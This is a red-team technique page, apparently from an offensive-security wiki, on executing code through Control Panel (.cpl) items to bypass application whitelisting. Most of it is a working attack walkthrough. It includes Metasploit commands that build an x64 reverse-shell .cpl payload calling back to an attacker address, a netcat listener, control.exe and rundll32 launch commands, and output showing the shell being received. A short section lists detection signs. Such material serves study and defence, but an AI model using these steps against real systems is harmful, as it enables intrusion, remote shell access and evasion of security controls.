Control Panel Item
Control Panel Item code execution - bypass application whitelisting.

Execution

Generating a simple x64 reverse shell in a .cpl format:
1
msfconsole
2
use windows/local/cve_2017_8464_lnk_lpe
3
set payload windows/x64/shell_reverse_tcp
4
set lhost 10.0.0.5
5
exploit
6
7
[email protected]~# nc -lvp 4444
8
listening on [any] 4444 ...
Copied!
We can see that the .cpl is simply a DLL with DllMain function exported:
A quick look at the dissasembly of the dll suggests that rundll32.exe will be spawned, a new thread will be created in suspended mode, which most likely will get injected with our shellcode and eventually resumed to execute that shellcode:
Invoking the shellcode via control.exe:
1
control.exe .\FlashPlayerCPLApp.cpl
2
# or
3
rundll32.exe shell32.dll,Control_RunDLL file.cpl
4
# or
5
rundll32.exe shell32.dll,Control_RunDLLAsUser file.cpl
Copied!
Attacking machine receiving the reverse shell:
1
10.0.0.2: inverse host lookup failed: Unknown host
2
connect to [10.0.0.5] from (UNKNOWN) [10.0.0.2] 49346
3
Microsoft Windows [Version 6.1.7601]
4
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
Copied!

Observations

Note how rundll32 spawns cmd.exe and establishes a connection back to the attacker - these are signs that should raise your suspicion when investingating a host for a compromise:
As always, sysmon logging can help in finding suspicious commandlines being executed in your environment:

Bonus - Create Shortcut With PowerShell

1
$TargetFile = "$env:SystemRoot\System32\calc.exe"
2
$ShortcutFile = "C:\experiments\cpl\calc.lnk"
3
$WScriptShell = New-Object -ComObject WScript.Shell
4
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
5
$Shortcut.TargetPath = $TargetFile
6
$Shortcut.Save()
Copied!

References

Signed Binary Proxy Execution: Control Panel, Sub-technique T1218.002 - Enterprise | MITRE ATT&CK®
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1060/T1060.md
github.com
Last modified 3yr ago